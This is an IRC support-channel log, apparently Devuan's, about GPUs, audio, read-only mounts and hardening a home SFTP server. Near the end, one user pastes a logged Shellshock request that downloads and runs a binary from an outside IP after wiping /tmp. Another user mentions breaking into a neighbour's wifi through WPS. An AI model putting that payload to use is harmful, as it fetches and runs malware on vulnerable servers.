drwhite | Howdy peeps... What needs to be installed so that the system can recognise multiple graphics cards and use them all at once? Or is that something that has been removed? Or is it something that can be added quickly please? | 00:31 |
---|---|---|
djph | like SLI? | 00:44 |
drwhite | no. | 00:46 |
djph | so just randomly throwing two or more cards in the pc? | 00:47 |
drwhite | I have CPU and Discrete | 00:48 |
drwhite | that makes 2 | 00:48 |
djph | and you inly plug into one ... | 00:48 |
djph | *only | 00:49 |
djph | unless its a laptop, and you've got to slap primusrun or whatever AMD uses. | 00:49 |
drwhite | primusrun? | 00:51 |
drwhite | I don't have to do that with other version of Linux. | 00:51 |
drwhite | Ubuntu doesn't have it and it can run 2 GPUs fine. | 00:51 |
djph | primus is nvidia's split-gpu laptop tech. dunno what amd does. | 00:53 |
djph | for a desktop, one normally ignores the cpu ... though ive always had enough outputs on the nvidia cards ... | 00:54 |
drwhite | But on a laptop, not always, because I use a docking station. | 01:00 |
drwhite | So Primus will allow Devuan to use both the i7 chip and the Discrete at the same time? | 01:02 |
drwhite | On a desktop, I often use the CPU for the on-board, and then have a GPU as well. | 01:03 |
alexandros_c | Happy Thanksgiving to all my American friends | 01:06 |
drwhite | Anyone here have a Lenovo P52? | 01:18 |
drwhite | and running Devuan. (of course) | 01:18 |
Xenguy | pm-is-supported returned no output: anyone know how to interpret that result? | 01:19 |
drwhite | djph: Trying it now. Is there anything else that needs to be installed at the same time? | 06:11 |
drwhite | what is "libsystemd0" ? | 07:00 |
drwhite | is that systemD? | 07:00 |
KatolaZ | drwhite: it's a library to use the systemd functionalities | 07:05 |
KatolaZ | harmless if you don't have systemd running in your system | 07:06 |
drwhite | it can be uninstalled? | 07:07 |
drwhite | or is it for those things that use systemD to integrate into a non systemd environment? | 07:07 |
KatolaZ | drwhite: | 07:16 |
premoboss | if i set some part of File System in "Read-only" (i.e. /usr/), will the general performances speed up? | 11:45 |
debdog | sounds unlogical hence it's possible | 11:47 |
premoboss | debdog, i think that there are not ovehead oj journal and no file system check at the start up and not "you have mounted the partitrion n times, check forced" messages at start up. | 11:49 |
KatolaZ | premoboss: if you don't write on it there is no journal overhead... | 11:55 |
KatolaZ | but having /usr ro is normally a bad idea | 11:56 |
KatolaZ | unless you decide to not ever install anything in there | 11:56 |
KatolaZ | premoboss: I also don't understand what you mean by "some part of File System" | 11:57 |
premoboss | KatolaZ, as far as i remenber, /usr is "almost" read only: i mean, after i istalled all i need in my system, /usr shour not be writable by any process, am i right? is /home and /var that usually are often wrote inside. | 11:58 |
KatolaZ | premoboss: I fail to see the point though | 12:00 |
debdog | on a server inside the DMZ the more places are ro the better. but I doubt it'll increase 'general' performance | 12:00 |
KatolaZ | that's why I fail to see the point | 12:01 |
premoboss | KatolaZ, my OS is on uSD. the point is that i wish to reduce I/O on uSD to (i hope) increase performances (no journal, no forced check on that partition, ecc) and to have less stress on yuSD caming from freqeunt write operations. | 12:02 |
Centurion_Dan | premoboss: then use ext2 | 12:02 |
KatolaZ | premoboss: but if you don't write anything in /usr, then you don't write enything | 12:02 |
KatolaZ | fullstop | 12:02 |
Centurion_Dan | I do that for /boot | 12:02 |
KatolaZ | where should the performance gain come from, if you don't write under /usr? | 12:02 |
KatolaZ | where should the I/O come from if you don't write on /usr? | 12:03 |
KatolaZ | there should be no write operation at all under /usr if you don't install/upgrade/remove packages | 12:03 |
KatolaZ | irrespective of it being ro or not | 12:03 |
debdog | to improve the µSDs life I'd look into fs options like noatime | 12:04 |
premoboss | if i use ext2 AND i get not clear shutdown, than i can have inconsistance filesystem and forced checke at treboot. so i need to make that /usr partition ext2 AND read only. sound right? | 12:04 |
Centurion_Dan | package installation aside there is little writing to /usr anyway, so mounting it with ext2 to get rid of the journal, and turning of noatime and you'll quiesce the writes to nearly nil anyway. | 12:04 |
premoboss | debdog, also noatime, yes, i forgot. and nodiratime also. | 12:04 |
KatolaZ | premoboss: no it sounds completely useless to me | 12:05 |
Centurion_Dan | premoboss: but a not clean shutdown only happens if you happen to be writing when the power is pulled. If the fs is not written to, it's not under risk of an unclean shutdown. | 12:05 |
premoboss | KatolaZ, id i have separate partition for /, /usr /home, /var, i wuill have faster check at the boot.. at least, i think so. | 12:06 |
premoboss | becasue /usr will ben ever checked because of read only. | 12:06 |
KatolaZ | premoboss: you are totally wrong on that | 12:06 |
KatolaZ | what you think is wrong | 12:06 |
Wonka | I have, once, had a debian on a Seagate Dockstar - rootfs was RO, and for updating I had a script using unbind and mount to get a shell in which alone the rootfs was re-mounted rw | 12:06 |
KatolaZ | you asked, we replied | 12:06 |
KatolaZ | you're free to decide yourself | 12:06 |
KatolaZ | just putting /usr ro is useless to reduce the load on a microSD | 12:07 |
premoboss | KatolaZ, ok | 12:07 |
premoboss | iw was a good idea in my mind, no probmel if i was wrong :-) | 12:07 |
gnarface | premoboss: try mounting /tmp as tmpfs instead | 12:23 |
Wonka | also /var/run | 12:31 |
system16 | Hi. i have a file server that runs no GUI or DE. i installed mpg123 on it. when i run mpg123 song.mp3 it says its playing it but there is no audio. i know this is silly . can this be a driver issue ? | 12:54 |
system16 | if yes , how can i install a generic driver for its built-in speaker ? | 12:54 |
gnarface | it's probably just a alsamixer settings issue | 12:55 |
gnarface | run alsamixer, make sure you've got volume on the right channels and they're unmuted | 12:55 |
gnarface | if it was a driver issue, usually you'd expect an error. not always, but usually. | 12:55 |
system16 | apt install alsamixer ? | 12:56 |
system16 | there is no package called alsamixer | 12:57 |
gnarface | it's in alsa-utils | 12:57 |
system16 | its downloading alsa-utils | 12:58 |
system16 | ok i ran alsamixer | 12:58 |
system16 | some bars showed up | 12:58 |
system16 | im not a audio guy. what do these mean ? | 12:59 |
gnarface | if you have more than one soundcard, these are only the controls for the first detected one | 12:59 |
system16 | it says master 0 | 12:59 |
gnarface | up/down arrows to change volume | 12:59 |
gnarface | "m" to toggle mute | 12:59 |
gnarface | left/right arrows to select volume slider | 13:00 |
system16 | 00 means mute ? | 13:00 |
system16 | or MM ? | 13:00 |
gnarface | MM is mute | 13:00 |
system16 | ok let me try again | 13:00 |
system16 | SHIt | 13:01 |
system16 | it worked | 13:01 |
system16 | thanks alot | 13:01 |
gnarface | no problem | 13:01 |
system16 | now i can make devuan run system initiated.mp3 on startup | 13:01 |
system16 | doo you know where is the startup directory ? | 13:02 |
system16 | do* | 13:02 |
gnarface | i don't know | 13:03 |
gnarface | there's a few ways to do it | 13:03 |
system16 | there is a script that runs commands on startup. i cant remember its name | 13:03 |
gnarface | are you thinking of /etc/rc.local? | 13:03 |
system16 | yes | 13:03 |
gnarface | that's probably the easiest thing to use if you're not using a GUI | 13:04 |
jyri | hmm, grub-install broke on ceres | 13:05 |
gnarface | uh oh | 13:05 |
jyri | grub-install: error: cannot copy `/usr/share/locale/bg.gmo' to `/boot/grub/locale/bg.mo': Is a directory. | 13:06 |
system16 | it wont break anything right ? (running a .mp3 file on startup ) | 13:06 |
gnarface | system16: nothing comes to mind | 13:07 |
system16 | damn. it has a loud speaker | 13:07 |
gnarface | it should be smart enough to save and restore the alsamixer settings on it's own | 13:08 |
gnarface | you can call amixer directly from your script if you want though | 13:08 |
system16 | why tho ? | 13:08 |
gnarface | oh, if you wanted to turn the volume down, or make sure it never got set above some arbitrary maximum | 13:09 |
system16 | its set on 65 (master) | 13:09 |
gnarface | no physical volume control on the speaker? | 13:09 |
system16 | no | 13:10 |
gnarface | eh | 13:10 |
system16 | when it ran windows , i controlled the speaker with fn+f7 | 13:10 |
gnarface | i've got my headphones set to 33 | 13:10 |
gnarface | hardware's all different, but if it's loud at 65 that's not a huge surprise | 13:11 |
system16 | its a netbook. | 13:11 |
system16 | https://www.soundsnap.com/search/audio/system+initiated/score | 13:19 |
system16 | which one do you prefer ? | 13:19 |
gnarface | of what? don't make me click the link | 13:32 |
system16 | gnarface, those are some system startup sounds | 13:45 |
system16 | i chose "light speed sequence initiated" | 13:45 |
gnarface | oh, gotcha | 13:45 |
system16 | that stupid website wanted to charge me 3 $ for a 6 second file. (but i recorded the sound with my phone using AUX) hahaha | 13:46 |
system16 | also. should i install a terminal based anti virus to keep my stuff safe ? | 15:19 |
gnarface | it's probably not necessary if you are following best practices | 15:20 |
system16 | like ? | 15:20 |
system16 | root login is off | 15:20 |
system16 | system is up-to-date | 15:20 |
gnarface | just, if you know how permissions work and you've got it secure, yea, and up-to-date | 15:20 |
system16 | i have a strong password | 15:20 |
gnarface | network side too | 15:20 |
gnarface | don't click on email attachments, etc | 15:21 |
system16 | gnarface, everything inside home is 777 | 15:21 |
gnarface | :-P | 15:21 |
system16 | afaik | 15:21 |
gnarface | that might be unnecessarily risk | 15:21 |
gnarface | risky | 15:21 |
system16 | <gnarface> don't click on email attachments, etc there is -no- GUI | 15:21 |
gnarface | oh, right, you said that | 15:21 |
gnarface | yea, that'll really limit the attack surface too | 15:22 |
system16 | then what should i do ? 776 ? 767 ? | 15:22 |
system16 | the only thing that is really bugging me is ssh key | 15:22 |
system16 | i use ssh password username login | 15:22 |
gnarface | the defaults should have been sane | 15:23 |
gnarface | 755 | 15:23 |
system16 | idk | 15:24 |
system16 | some are 777 | 15:24 |
system16 | some are not | 15:24 |
system16 | only my ex drive is 777 | 15:24 |
system16 | i just found out its not | 15:25 |
system16 | so i think im good on permissions side | 15:25 |
system16 | what next ? | 15:25 |
system16 | fail2ban is running but idk how to configure it | 15:26 |
gnarface | firewall? | 15:26 |
system16 | my router has firewall | 15:26 |
system16 | its up-to-date. | 15:27 |
system16 | the router* | 15:27 |
system16 | gnarface, should i set up a firewall on the server too ? | 15:28 |
gnarface | wouldn't hurt | 15:28 |
gnarface | probably | 15:28 |
system16 | do you know how ? | 15:28 |
gnarface | i can give you some simple iptables commands that might work | 15:29 |
gnarface | nothing fancy | 15:29 |
system16 | thanks. go ahead | 15:29 |
system16 | i must be root right ? | 15:30 |
gnarface | yea | 15:30 |
system16 | it wont mess with ssh_d and sftp and open ssh right ? | 15:31 |
system16 | (this is a sftp server) | 15:31 |
gnarface | it will unless you leave a hole for ssh | 15:31 |
system16 | what | 15:32 |
system16 | oh its like windows firewall right ? | 15:32 |
gnarface | yea i guess | 15:33 |
system16 | then i cant run them rn | 15:33 |
system16 | because im using ssh | 15:33 |
system16 | and the server is under my closet | 15:34 |
system16 | (im feeling lazy right now) | 15:34 |
gnarface | well i'm sure you can find examples online | 15:34 |
nemo | why does devuan recommend following the LSB init conventions but does not have /usr/lib/lsb/install_initd ? | 15:35 |
nemo | is this some debian thing I'm unfamiliar with? | 15:35 |
system16 | the ultimate fix is to disable port forwarding | 15:35 |
system16 | which makes this only accessible on LAN | 15:35 |
nemo | system16: eh... I'm still super annoyed that my router does not have an option to block the HTTP server on the wifi interface - I don't need a full firewall, just option to specify interfaces for bind | 15:37 |
nemo | system16: sometimes the LAN is not super trustworthy either | 15:37 |
nemo | basically I occasionally have to give wifi password to folks visiting and I don't want to trust router's webserver given historical fails on that front | 15:37 |
system16 | nano like my neighbor wants to see whats on my server ? | 15:38 |
system16 | i managed to hack his wifi due to WPS | 15:38 |
nemo | can see why depending on LAN one might not trust it. also if the machine is a laptop could be on all kinds of hostile LANs | 15:38 |
system16 | with a simple android app on google play lol | 15:38 |
nemo | system16: when the local fios company was deploying in this area they issued everyone wifi with a 40 bit wep key | 15:38 |
system16 | i have disabled WPS | 15:38 |
system16 | of course im using WPA-2 | 15:39 |
nemo | system16: the funny thing about it was the wep key shared first 24 bits of an alphanumeric uppercase key with the network name | 15:39 |
nemo | just to make things easier ☺ | 15:39 |
system16 | they are dumb af | 15:39 |
nemo | but yeah. on most linux systems one knows what is running, so firewall is not super useful IMO | 15:39 |
nemo | system16: yeah you could manually "hack" it just by iterating over 36² combinations | 15:40 |
nemo | they did eventually fix that, although there's still a few of them floating around | 15:41 |
system16 | how the hell did you do this ?? 36^2 ??? | 15:41 |
system16 | its format is like textbooks | 15:42 |
nemo | hm? | 15:42 |
nemo | oh | 15:42 |
nemo | XCompose ftw ☺ | 15:42 |
nemo | I bind it to capslock key | 15:42 |
system16 | damn | 15:42 |
nemo | https://docs.perl6.org/language/unicode_entry#XCompose_(Linux) | 15:42 |
system16 | nemo can u hack my server ? | 15:42 |
nemo | system16: I also have some useful emoji in mine | 15:42 |
nemo | O_o | 15:43 |
system16 | probably not | 15:43 |
r3boot | nemo: a firewall is very useful tool, especially in the 'you know what runs' scenario, since stuff that's not supposed to run will be blocked by default + needs explicit whitelisting | 15:43 |
system16 | its security is to notch | 15:43 |
nemo | most "hacking" these days is spear phishing/social engineering | 15:43 |
system16 | top* | 15:43 |
nemo | r3boot: sure sure. it's just I happen to know what's running is all | 15:43 |
system16 | i mean can you force your way into my server ? | 15:43 |
system16 | brute force* | 15:43 |
nemo | r3boot: it's the rationale behind lack of default firewall on many distros | 15:43 |
r3boot | nemo: sure. And are you 100% sure that those apps dont make any outbound connections? How do you guarantee that? ;) | 15:44 |
nemo | including ubuntu and debian | 15:44 |
system16 | u need my username and password which is extremely long | 15:44 |
system16 | and my public ip | 15:44 |
nemo | r3boot: the services? I know which ones make outbound connections yes | 15:44 |
system16 | which changes every day | 15:44 |
system16 | or my ddns domain | 15:44 |
r3boot | nemo: and now one of your services is hacked + spawns a bind shell, now what? :) | 15:44 |
nemo | r3boot: and no I'm not going to review the code, although I've run netstat and such in past when something seemed odd | 15:44 |
nemo | r3boot: if I've been hacked firewall is not going to protect me | 15:45 |
r3boot | yes, it will, because it will block the connection to the bind shell | 15:45 |
nemo | … | 15:45 |
nemo | r3boot: if someone has root access it is game over | 15:45 |
nemo | firewall will do jack squat | 15:45 |
system16 | nemo, but can you ? | 15:45 |
r3boot | sure, but you dont run stuff as root right? | 15:45 |
r3boot | + you're patched & are running a RBAC framework, so getting root is not easily possible | 15:46 |
system16 | root login is off | 15:46 |
system16 | and there is no GUI | 15:46 |
system16 | no DE | 15:46 |
r3boot | all it takes is one vulnerable service | 15:46 |
nemo | r3boot: ok. I see scenario. for example. considering apache as service w/ a (large) attack surface. someone manages a local execute. trouble is. service is already doing outbound connections. so detecting that is pretty tricky apart from monitoring traffic | 15:46 |
system16 | plain command - line interface | 15:46 |
r3boot | nemo: apache normally only makes connections towards backend services, not towards the internet, so that's trivial to detect | 15:47 |
nemo | r3boot: apart from that there's not much exposed outbound to hack | 15:47 |
r3boot | that's obscurity | 15:47 |
r3boot | you want multiple levels of defense ;) | 15:47 |
nemo | r3boot: eh. I do have some relaying on mine | 15:47 |
system16 | r3boot, everything is uptodate | 15:47 |
nemo | r3boot: I understand *why* people have it | 15:47 |
system16 | i ran apt upgrade | 15:47 |
nemo | r3boot: and I even listed at lesat one case locally I wish I had it, and still don't | 15:48 |
system16 | im planning to put apt upgrade on startup | 15:48 |
nemo | I'm just questioning it being of super-high utility | 15:48 |
system16 | using rc.local | 15:48 |
r3boot | I just think it's bad advice to tell people /not/ to run a packetfilter | 15:48 |
r3boot | you should run one, by default, to ensure that you know what goes in/out of a system | 15:48 |
r3boot | + are able to provide guarantees for that | 15:48 |
nemo | ?? did I say they shouldn't? | 15:48 |
nemo | wut | 15:49 |
r3boot | I guess we have a difference in definition of 'super useful' | 15:49 |
nemo | anyway. devuan by default does not have one | 15:49 |
nemo | so I guess devuan is giving bad default advice too by your definition ☺ | 15:49 |
r3boot | almost no OS/Distro comes with a default-deny packetfilter :( | 15:49 |
system16 | is devuan safe out of the box ? | 15:49 |
nemo | ubuntu either | 15:50 |
nemo | hm | 15:50 |
nemo | although that might have changed | 15:50 |
r3boot | centos/rh does, but that comes with a default-allow ruleset | 15:50 |
system16 | im trying to setup fail2ban | 15:50 |
nemo | my information about ubuntu halted at 14.04 | 15:50 |
r3boot | the BSD's dont come with a firewall | 15:50 |
r3boot | nor do the commercial unices | 15:50 |
r3boot | (+ dont come with a firewall thats enabled by default) | 15:50 |
nemo | system16: anyway WRT "hacking" people, I lost any interest in that a long long time ago. basically once past college computer lab | 15:51 |
nemo | " | 15:51 |
nemo | "hacking" up stuff on my own system is way more fun/productive | 15:51 |
r3boot | The 'why' for that is much more difficult tho. Part of it has to do with people not understanding TCP/IP, part of it has to do with people not wanting to bother with packetfilters, etc | 15:51 |
system16 | do you think im at risk | 15:51 |
system16 | ? | 15:51 |
r3boot | system16: if you just stick to your part of the internet and dont piss off anybody, you'll be just fune | 15:52 |
system16 | wat ? | 15:52 |
r3boot | *fine | 15:52 |
system16 | port forwarding is ON. should i turn it off ? | 15:52 |
r3boot | port forwarding to *which* port? | 15:52 |
system16 | 22 | 15:52 |
r3boot | not a problem | 15:52 |
nemo | r3boot: the actual things that make my system significantly vulnerable (browser, intel boot manager, crappy ssh passwords) are not going to be mitigated by firewall | 15:52 |
nemo | r3boot: that's why I can't bring myself to care | 15:52 |
system16 | i tried changing it. no luck | 15:52 |
nemo | it's a significant complexity for the 0.1% case | 15:53 |
r3boot | nemo: even in those cases it's very useful. Run your vulnerable apps under a different userid then your login id, and use iptables with uid/gid matching to only allow the connections you want | 15:53 |
nemo | r3boot: at present I have exactly 2 things bound. ssh and apache | 15:54 |
* nemo takes down apache again | 15:54 | |
* r3boot used to run my browser under a different user id which forced *all* connections through a proxy (no direct connection possible) | 15:54 | |
system16 | LOL | 15:54 |
system16 | Server replied: pong | 15:54 |
system16 | i pinged the fail2ban server | 15:54 |
system16 | i think it pinged 127.0.0.1 ? | 15:54 |
r3boot | nemo: otoh, I work with servers most of the time, and on those boxen, you *want* outbound firewalling | 15:54 |
nemo | r3boot: yeah. sorry. don't care enough | 15:55 |
nemo | but I understand the attractiveness of that kinda thing | 15:55 |
r3boot | desktops are a lot harder to secure, yes | 15:55 |
nemo | r3boot: I don't work much with the servers at work, but AFAIK they are restricting traffic outside the server itself | 15:55 |
nemo | r3boot: on the various segmented LANs | 15:55 |
system16 | is 1 jail enough ? | 15:55 |
system16 | |- Number of jail: 1 | 15:55 |
system16 | `- Jail list: ssh | 15:55 |
KatolaZ | system16: it depends on the number of thieves.... | 15:56 |
system16 | what about sftp ?? | 15:56 |
system16 | should i add more ? | 15:56 |
r3boot | system16: maybe it would help you if you read up a little bit about hosting services before you ask such questions | 15:56 |
nemo | r3boot: like. I can ssh in to my dev server, but not out, and that has nothing to do with the rules on it. | 15:56 |
nemo | r3boot: got to fill out annoying amoutn of paperwork to do anything fun | 15:56 |
r3boot | nemo: ah, then you have firewalling on the network level I think | 15:57 |
nemo | that's what I said? | 15:57 |
r3boot | yep | 15:57 |
r3boot | or atleast, that's what I inferred based on the dev server, with vlans, and not being able to send out outbound traffic without filing paperwork | 15:58 |
nemo | 09:35 <+nemo> why does devuan recommend following the LSB init conventions but does not have /usr/lib/lsb/install_initd ? | 15:58 |
nemo | I'm trying to install a cylance service "properly" | 15:58 |
system16 | r3boot im just trying to keep uninvited guests out | 15:58 |
nemo | already had to hack up the .deb to make their stupid kernel module load on debian | 15:59 |
nemo | I thought install_initd would be the way to go | 15:59 |
nemo | (right now I just made the symlinks manually - but I added the header since the init manager complained) | 15:59 |
r3boot | system16: just use ssh pubkey authentication and disable password-based logins. Then you dont even need the complexity of fail2ban | 15:59 |
system16 | i tried that before | 15:59 |
system16 | cannot be done | 15:59 |
r3boot | LOL | 15:59 |
r3boot | why not? | 16:00 |
system16 | it would keep asking a password | 16:00 |
system16 | and it was too complex | 16:00 |
nemo | I'm running fail2ban just 'cause the log noise annoys me. also a couple of those assholes also spam my apache. one of them I knew and actually found something I was mildly careless with | 16:00 |
nemo | I mean. didn't do any harm, but was irritating | 16:00 |
r3boot | system16: right, okay, well, its /the/ solution for securing your ssh | 16:00 |
r3boot | system16: fail2ban will not protect you from accounts with bad passwords | 16:01 |
KatolaZ | system16: if it keeps asking for a password you have a problem in your sshd config | 16:01 |
system16 | i have a 11 character password | 16:01 |
system16 | it has every thing in it | 16:01 |
KatolaZ | o_O | 16:01 |
system16 | numbers...letters... etc. | 16:01 |
system16 | symbols | 16:01 |
KatolaZ | and you think that's "secure"? | 16:01 |
KatolaZ | :D | 16:01 |
system16 | at least its not 1234 | 16:01 |
r3boot | there are multiple things to check here. 1) Is pubkey auth enabled in sshd? 2) Is your authorized_keys file only readable by your own userid? and 3) is there any RBAC framework blocking access to authorized_keys? | 16:02 |
nemo | KatolaZ: well if someone is trying to guess by trial and error, almost anything that isn't "password" is probably fine - these people don't even bother with the published lists | 16:02 |
r3boot | oh, and 4) Are you passing your ssh key along with ssh? | 16:02 |
KatolaZ | is the .ssh/ folder only rx for the owner? | 16:02 |
r3boot | KatolaZ: yes | 16:02 |
r3boot | 0700 for .ssh, 0600 for authorized_keys | 16:02 |
KatolaZ | is the key the correct one? | 16:02 |
nemo | KatolaZ: I'm pretty sure most of the probes are just hunting for unsecured IoS stuff | 16:02 |
r3boot | assumptions ;) | 16:03 |
system16 | fyi i reverted every setting that i made. i have to start on square 1 | 16:03 |
system16 | ALSO | 16:03 |
r3boot | but okay, I'll shut up | 16:03 |
system16 | some apps wont use ssh key | 16:03 |
KatolaZ | system16: you also have to do some reading about ssh config | 16:03 |
r3boot | (way to many years of experience with hosting industries, I'll let you guys make your own mistakes) | 16:03 |
system16 | vlc does not support user pass auth | 16:04 |
nemo | O_o | 16:04 |
nemo | vlc supports ssh authentication? | 16:04 |
r3boot | Setup a ssh tunnel then :) | 16:04 |
nemo | whaaat | 16:04 |
nemo | what for? | 16:04 |
system16 | KatolaZ, i know what is that. i used that to disable root login | 16:04 |
system16 | nemo, to stream stuff to TV | 16:05 |
system16 | it has a sftp browser built in | 16:05 |
r3boot | chromecast stuff? Or some other protocol? | 16:05 |
system16 | yes. | 16:05 |
system16 | chromecast | 16:05 |
r3boot | that wont work over ssh, since that requires multicast | 16:05 |
system16 | well it works rn | 16:06 |
system16 | soo | 16:06 |
r3boot | well, not unless you setup a tun/tap device and either make that part of the layer2 segment, or enable multicast routing on your network | 16:06 |
nemo | system16: I don't know too much about your setup, but personally I'm not a huge fan of smart TVs - I settled on an old laptop plugged into TV - is super flexible as to playing whatever random stuff, and is also easy to transport ☺ | 16:06 |
* r3boot has kodi for that | 16:07 | |
system16 | this is a SFTP server | 16:07 |
system16 | and vlc supports sftp | 16:07 |
system16 | as simple as that | 16:07 |
r3boot | Aha, that's not a chromecast protocol ;) | 16:07 |
nemo | system16: so.. that's not super surprising then. sure | 16:07 |
system16 | and vlc casts that to my chromecast | 16:07 |
nemo | system16: like. tons of stuff uses gvfs - not too sure what vlc uses | 16:07 |
nemo | system16: but if it is using gvfs or similar then so long as your ssh key is in your keyring, it should just work | 16:08 |
r3boot | worse-case you could use sshfs | 16:08 |
system16 | i asked the vlc staff, they said future vlc ver. will *probably* support ssh key | 16:08 |
nemo | back when my SO was on her first-gen iOS I satisfied her desire to access her iphone from her linux machine using myTunes to fix the file naming plus ssh automount | 16:08 |
system16 | and i mainly use my server to stream stuff soo | 16:09 |
nemo | autofs + sshfs | 16:09 |
nemo | can use that if whatever the heck vlc is using is being a PITA for you | 16:09 |
nemo | it works surprisingly fast | 16:09 |
system16 | how many IPs does 1 jail house ? 1 ? | 16:09 |
r3boot | system16: you could also try to enable ssh multiplexing, and then (using autossh or a custom script) let your system establish the multiplexing tunnel. Next, reconfigure your vlc to just use ssh + connection multiplexing, and you can bypass authentication | 16:09 |
system16 | sounds like its not EZ | 16:10 |
nemo | but yeah in her case ~/Desktop/iphone when doubleclicked on autofs connected to the iphone so she could see her music | 16:10 |
r3boot | system16: hosting isnt easy ;) | 16:10 |
system16 | it is | 16:10 |
system16 | im doing it rn | 16:10 |
r3boot | ahja, okay, well, good luck then :) | 16:10 |
system16 | haha | 16:10 |
nemo | system16: bet vlc can also do HTTP, why not just share your local media over that? it's LAN anyway | 16:10 |
nemo | why not let everyone get to it? | 16:10 |
system16 | its no on lan | 16:11 |
nemo | ah | 16:11 |
system16 | its on the internet as well | 16:11 |
r3boot | Just chmod 0777 it ;+ | 16:11 |
r3boot | (no, dont do that!) | 16:11 |
nemo | system16: your chromecast tv is not LAN? O_o | 16:11 |
system16 | as i said. i have port forwarding enabled | 16:11 |
system16 | no no | 16:11 |
system16 | the sftp server is on wan and lan (thats what i meant) | 16:11 |
nemo | system16: ok... so... you'd still be fine w/ HTTP on LAN for VLC+chromecast ☺ | 16:11 |
nemo | and probably pretty trivial to enable | 16:12 |
nemo | heck maybe chromecast can read http too. dunno | 16:12 |
r3boot | nemo: but, is it an actual chromecast device? :) A chromecast uses rtmp-over-multicast, not sftp | 16:12 |
system16 | i live near a street filled w/ dru addicts | 16:12 |
system16 | drug* | 16:12 |
system16 | and my router has a strong antenna | 16:12 |
system16 | its wifi signal reaches the stree | 16:12 |
system16 | t | 16:12 |
system16 | i cant limit it because of stupid dlink | 16:13 |
nemo | r3boot: I think he said he was streaming to chromecast from vlc | 16:13 |
nemo | r3boot: and vlc was reading his movies off of the sftp server | 16:13 |
system16 | it has 3 options : antenna power : 100 % 50 % 25 % | 16:13 |
nemo | r3boot: and I was just suggesting HTTP as being maybe easier to setup for his local media lirbary | 16:13 |
system16 | 50% is too low | 16:13 |
system16 | isnt http unsafe ? | 16:14 |
nemo | system16: what does your wifi signal have to do w/ this? you said the network was using WPA2 | 16:14 |
system16 | yes | 16:14 |
nemo | system16: http, https. whatever. it's your LAN. you claim it's encrypted already | 16:14 |
system16 | but it does not mean its unhackable | 16:14 |
nemo | system16: the only existing WPA2 hack attacks the device. make sure your devices are up to date ☺ | 16:14 |
system16 | it is | 16:15 |
nemo | (KRACK) | 16:15 |
system16 | is it possible to ditch wlan0 ? | 16:15 |
system16 | on the server | 16:15 |
nemo | is your house wired with cat5? | 16:15 |
system16 | (its connected via ethernet) | 16:15 |
r3boot | nemo: oh, like that, yeah | 16:15 |
system16 | i think the command started with ifconfig | 16:16 |
nemo | system16: anyway. if you don't trust your LAN, which is probably not unreasonable. HTTPS - whatever. | 16:16 |
system16 | https ? | 16:17 |
system16 | a web server ? | 16:17 |
nemo | 10:14 < system16> isnt http unsafe ? | 16:18 |
nemo | https + letsencrypt | 16:18 |
KatolaZ | o_O | 16:18 |
nemo | maximise devices that can connect to your movies ☺ | 16:18 |
system16 | ssh is better i think. because i can remotely manage my server | 16:18 |
system16 | nemo , right now, my freaking smart watch can connect to it | 16:20 |
nemo | system16: uh. you can have both running | 16:20 |
nemo | was just thinking it might be easier for your chromecast/phone/vlc/firefox/whatever | 16:20 |
* nemo shrugs | 16:20 | |
system16 | did you mean HTTPS file server ? | 16:20 |
nemo | yes | 16:20 |
system16 | oh | 16:21 |
system16 | its kinda cool. it will have a web server too | 16:21 |
nemo | judging from the spam in my apache log, not installing any CGIs or PHP interfaces avoids 99.9% of the attacks out there | 16:22 |
nemo | so just hosting static content, probably totally fine | 16:22 |
nemo | not to mention could just do it on LAN for starters | 16:22 |
system16 | currently , there are movies, photos and bunch of apps on the server | 16:23 |
nemo | some of the stuff in log is fairly entertaining | 16:23 |
nemo | example | 16:24 |
system16 | OH | 16:24 |
nemo | 222.186.138.49 - - [12/Jan/2018:13:18:39 -0500] "GET / HTTP/1.1" 200 5710 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.158.162.80:258/synliang -O /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { | 16:24 |
system16 | did i mention that | 16:24 |
nemo | :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.158.162.80:258/synliang -O /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" | 16:24 |
system16 | this server is not on all the time ? | 16:24 |
nemo | that script does not seem very efficiently written | 16:24 |
system16 | i suspend it when i dont need it | 16:24 |
system16 | and it does not support WoL so no one can wake it up on lan or wan | 16:25 |
nemo | system16: oh it was you doing that | 16:25 |
nemo | system16: yeah. I was wondering why you don't just leave it on all the time using a low power device ☺ | 16:25 |
nemo | system16: I think I ran numbers and based on machine you are using now, an RPI would pay for itself in about a year | 16:25 |
system16 | 2 reasons 1- its a netbook i dont want to put pressure on it. 2-safety | 16:25 |
system16 | 3-why not ? | 16:25 |
nemo | 'cause having it on all the time is more convenient | 16:26 |
nemo | ② is pretty dubious | 16:26 |
nemo | ① is fixed by switching to an RPI zero ☺ | 16:26 |
system16 | i have plugged in a wireless usb mouse. when i right click it. it wakes up | 16:27 |
* nemo shrugs | 16:28 | |
nemo | system16: might be out and about one day and wishing you didn't have it suspended to get to something at home | 16:28 |
system16 | if it works it aint stupid :) | 16:28 |
system16 | yes. thats the only down side | 16:28 |
mooseface420 | dragon isn't playing audio and vlc install failed lol | 16:41 |
jordila | i would like to downgrade from Firefox-ESR actually in v60 to v52. If possible which is the recommende path to ? | 16:48 |
nemo | mooseface420: I had VLC install problems some time ago, that were due to having wrong repos after migration to ascii | 16:49 |
nemo | mooseface420: no idea if your problems are same | 16:49 |
nemo | jordila: so. 52 is unsupported at your own risk - you should download a zip of it off the mozilla server, and run it standalone yourself | 16:49 |
nemo | jordila: noscript strongly recommended - and I understand why you are doing this... one of my firefox profiles is still on 52 | 16:50 |
nemo | hell. one's still on *4* due to the occasional legacy crap that only speaks old versions of https | 16:50 |
nemo | jordila: but yeah. it's obviously a dangerous thing to do | 16:50 |
nemo | jordila: if you list the extensions you're dependent on, could try seeing if there's finally versions of 'em out there | 16:51 |
